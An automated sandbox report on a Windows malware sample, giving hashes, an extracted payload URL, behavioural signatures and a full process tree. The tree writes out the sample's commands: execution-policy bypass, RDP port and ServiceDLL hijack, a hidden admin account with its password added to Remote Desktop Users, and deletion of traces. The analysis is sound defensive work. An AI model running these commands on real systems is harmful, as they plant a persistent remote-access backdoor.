Analysis
-
max time kernel
79s -
max time network
122s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-04-2021 15:26
Static task
static1
Behavioral task
behavioral1
Sample
1e9f45329ffece31382bb884367f58df.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
1e9f45329ffece31382bb884367f58df.exe
Resource
win10v20201028
General
-
Target
1e9f45329ffece31382bb884367f58df.exe
-
Size
6.0MB
-
MD5
1e9f45329ffece31382bb884367f58df
-
SHA1
52d3d55364d8c4d350231d38bfe6eb156cf8473f
-
SHA256
8779c8ac97c45254bc243e2ee79b436d1a96bc56885dcaa72c4837790b2071fc
-
SHA512
12272d5f20c42764992420aa1a178b16d7ef1873f2c9619bd8ac16e0eb9a0067a08a9d70863c1d3e95dd4a2aa19c081ae0baabaf3431f5068ea7191c8f4d6c62
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 21 1908 powershell.exe 23 1908 powershell.exe 24 1908 powershell.exe 25 1908 powershell.exe 27 1908 powershell.exe 29 1908 powershell.exe 31 1908 powershell.exe 33 1908 powershell.exe 35 1908 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 1348 1348 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B90.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4C6D.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ae51x2f3.b41.ps1 powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4CBC.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4CDD.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4C3D.tmp powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_gbwjtggz.3bu.psm1 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3180 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 7fd9c04391add601 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 24 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 25 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 27 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 656 powershell.exe 656 powershell.exe 656 powershell.exe 3384 powershell.exe 3384 powershell.exe 3384 powershell.exe 704 powershell.exe 704 powershell.exe 704 powershell.exe 2040 powershell.exe 2040 powershell.exe 2040 powershell.exe 656 powershell.exe 656 powershell.exe 656 powershell.exe 1908 powershell.exe 1908 powershell.exe 1908 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 636 636 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 656 powershell.exe Token: SeDebugPrivilege 3384 powershell.exe Token: SeIncreaseQuotaPrivilege 3384 powershell.exe Token: SeSecurityPrivilege 3384 powershell.exe Token: SeTakeOwnershipPrivilege 3384 powershell.exe Token: SeLoadDriverPrivilege 3384 powershell.exe Token: SeSystemProfilePrivilege 3384 powershell.exe Token: SeSystemtimePrivilege 3384 powershell.exe Token: SeProfSingleProcessPrivilege 3384 powershell.exe Token: SeIncBasePriorityPrivilege 3384 powershell.exe Token: SeCreatePagefilePrivilege 3384 powershell.exe Token: SeBackupPrivilege 3384 powershell.exe Token: SeRestorePrivilege 3384 powershell.exe Token: SeShutdownPrivilege 3384 powershell.exe Token: SeDebugPrivilege 3384 powershell.exe Token: SeSystemEnvironmentPrivilege 3384 powershell.exe Token: SeRemoteShutdownPrivilege 3384 powershell.exe Token: SeUndockPrivilege 3384 powershell.exe Token: SeManageVolumePrivilege 3384 powershell.exe Token: 33 3384 powershell.exe Token: 34 3384 powershell.exe Token: 35 3384 powershell.exe Token: 36 3384 powershell.exe Token: SeDebugPrivilege 704 powershell.exe Token: SeIncreaseQuotaPrivilege 704 powershell.exe Token: SeSecurityPrivilege 704 powershell.exe Token: SeTakeOwnershipPrivilege 704 powershell.exe Token: SeLoadDriverPrivilege 704 powershell.exe Token: SeSystemProfilePrivilege 704 powershell.exe Token: SeSystemtimePrivilege 704 powershell.exe Token: SeProfSingleProcessPrivilege 704 powershell.exe Token: SeIncBasePriorityPrivilege 704 powershell.exe Token: SeCreatePagefilePrivilege 704 powershell.exe Token: SeBackupPrivilege 704 powershell.exe Token: SeRestorePrivilege 704 powershell.exe Token: SeShutdownPrivilege 704 powershell.exe Token: SeDebugPrivilege 704 powershell.exe Token: SeSystemEnvironmentPrivilege 704 powershell.exe Token: SeRemoteShutdownPrivilege 704 powershell.exe Token: SeUndockPrivilege 704 powershell.exe Token: SeManageVolumePrivilege 704 powershell.exe Token: 33 704 powershell.exe Token: 34 704 powershell.exe Token: 35 704 powershell.exe Token: 36 704 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeIncreaseQuotaPrivilege 2040 powershell.exe Token: SeSecurityPrivilege 2040 powershell.exe Token: SeTakeOwnershipPrivilege 2040 powershell.exe Token: SeLoadDriverPrivilege 2040 powershell.exe Token: SeSystemProfilePrivilege 2040 powershell.exe Token: SeSystemtimePrivilege 2040 powershell.exe Token: SeProfSingleProcessPrivilege 2040 powershell.exe Token: SeIncBasePriorityPrivilege 2040 powershell.exe Token: SeCreatePagefilePrivilege 2040 powershell.exe Token: SeBackupPrivilege 2040 powershell.exe Token: SeRestorePrivilege 2040 powershell.exe Token: SeShutdownPrivilege 2040 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeSystemEnvironmentPrivilege 2040 powershell.exe Token: SeRemoteShutdownPrivilege 2040 powershell.exe Token: SeUndockPrivilege 2040 powershell.exe Token: SeManageVolumePrivilege 2040 powershell.exe Token: 33 2040 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
1e9f45329ffece31382bb884367f58df.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 832 wrote to memory of 656 832 1e9f45329ffece31382bb884367f58df.exe powershell.exe PID 832 wrote to memory of 656 832 1e9f45329ffece31382bb884367f58df.exe powershell.exe PID 656 wrote to memory of 3200 656 powershell.exe csc.exe PID 656 wrote to memory of 3200 656 powershell.exe csc.exe PID 3200 wrote to memory of 2040 3200 csc.exe cvtres.exe PID 3200 wrote to memory of 2040 3200 csc.exe cvtres.exe PID 656 wrote to memory of 3384 656 powershell.exe powershell.exe PID 656 wrote to memory of 3384 656 powershell.exe powershell.exe PID 656 wrote to memory of 704 656 powershell.exe powershell.exe PID 656 wrote to memory of 704 656 powershell.exe powershell.exe PID 656 wrote to memory of 2040 656 powershell.exe powershell.exe PID 656 wrote to memory of 2040 656 powershell.exe powershell.exe PID 656 wrote to memory of 2496 656 powershell.exe reg.exe PID 656 wrote to memory of 2496 656 powershell.exe reg.exe PID 656 wrote to memory of 2296 656 powershell.exe reg.exe PID 656 wrote to memory of 2296 656 powershell.exe reg.exe PID 656 wrote to memory of 3976 656 powershell.exe reg.exe PID 656 wrote to memory of 3976 656 powershell.exe reg.exe PID 656 wrote to memory of 2160 656 powershell.exe net.exe PID 656 wrote to memory of 2160 656 powershell.exe net.exe PID 2160 wrote to memory of 360 2160 net.exe net1.exe PID 2160 wrote to memory of 360 2160 net.exe net1.exe PID 656 wrote to memory of 220 656 powershell.exe cmd.exe PID 656 wrote to memory of 220 656 powershell.exe cmd.exe PID 220 wrote to memory of 1020 220 cmd.exe cmd.exe PID 220 wrote to memory of 1020 220 cmd.exe cmd.exe PID 1020 wrote to memory of 2352 1020 cmd.exe net.exe PID 1020 wrote to memory of 2352 1020 cmd.exe net.exe PID 2352 wrote to memory of 1476 2352 net.exe net1.exe PID 2352 wrote to memory of 1476 2352 net.exe net1.exe PID 656 wrote to memory of 3260 656 powershell.exe cmd.exe PID 656 wrote to memory of 3260 656 powershell.exe cmd.exe PID 3260 wrote to memory of 3180 3260 cmd.exe cmd.exe PID 3260 wrote to memory of 3180 3260 cmd.exe cmd.exe PID 3180 wrote to memory of 2248 3180 cmd.exe net.exe PID 3180 wrote to memory of 2248 3180 cmd.exe net.exe PID 2248 wrote to memory of 2180 2248 net.exe net1.exe PID 2248 wrote to memory of 2180 2248 net.exe net1.exe PID 3220 wrote to memory of 4040 3220 cmd.exe net.exe PID 3220 wrote to memory of 4040 3220 cmd.exe net.exe PID 4040 wrote to memory of 4056 4040 net.exe net1.exe PID 4040 wrote to memory of 4056 4040 net.exe net1.exe PID 4060 wrote to memory of 2832 4060 cmd.exe net.exe PID 4060 wrote to memory of 2832 4060 cmd.exe net.exe PID 2832 wrote to memory of 228 2832 net.exe net1.exe PID 2832 wrote to memory of 228 2832 net.exe net1.exe PID 2360 wrote to memory of 1684 2360 cmd.exe net.exe PID 2360 wrote to memory of 1684 2360 cmd.exe net.exe PID 1684 wrote to memory of 1652 1684 net.exe net1.exe PID 1684 wrote to memory of 1652 1684 net.exe net1.exe PID 1964 wrote to memory of 3108 1964 cmd.exe net.exe PID 1964 wrote to memory of 3108 1964 cmd.exe net.exe PID 3108 wrote to memory of 2184 3108 net.exe net1.exe PID 3108 wrote to memory of 2184 3108 net.exe net1.exe PID 2552 wrote to memory of 4012 2552 cmd.exe net.exe PID 2552 wrote to memory of 4012 2552 cmd.exe net.exe PID 4012 wrote to memory of 3220 4012 net.exe net1.exe PID 4012 wrote to memory of 3220 4012 net.exe net1.exe PID 2496 wrote to memory of 2364 2496 cmd.exe net.exe PID 2496 wrote to memory of 2364 2496 cmd.exe net.exe PID 2364 wrote to memory of 2932 2364 net.exe net1.exe PID 2364 wrote to memory of 2932 2364 net.exe net1.exe PID 3832 wrote to memory of 1244 3832 cmd.exe WMIC.exe PID 3832 wrote to memory of 1244 3832 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1e9f45329ffece31382bb884367f58df.exe"C:\Users\Admin\AppData\Local\Temp\1e9f45329ffece31382bb884367f58df.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g0l1vtu2\g0l1vtu2.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC51.tmp" "c:\Users\Admin\AppData\Local\Temp\g0l1vtu2\CSCB2B44974A09B4C2AAD7F22AFD19B374.TMP"4⤵PID:2040
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2496
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:2296
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:3976
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:360
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1476
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:2180
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2968
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C timeout -n t& del C:\Users\Admin\AppData\Local\Temp\1e9f45329ffece31382bb884367f58df.exe2⤵PID:3972
-
C:\Windows\system32\timeout.exetimeout -n t3⤵
- Delays execution with timeout.exe
PID:3180
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:4056
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc KhHboRk1 /add1⤵
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc KhHboRk1 /add2⤵
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc KhHboRk1 /add3⤵PID:228
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1652
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3108 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD3⤵PID:2184
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:3220
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc KhHboRk11⤵
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc KhHboRk12⤵
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc KhHboRk13⤵PID:2932
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
PID:1244
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:360
-
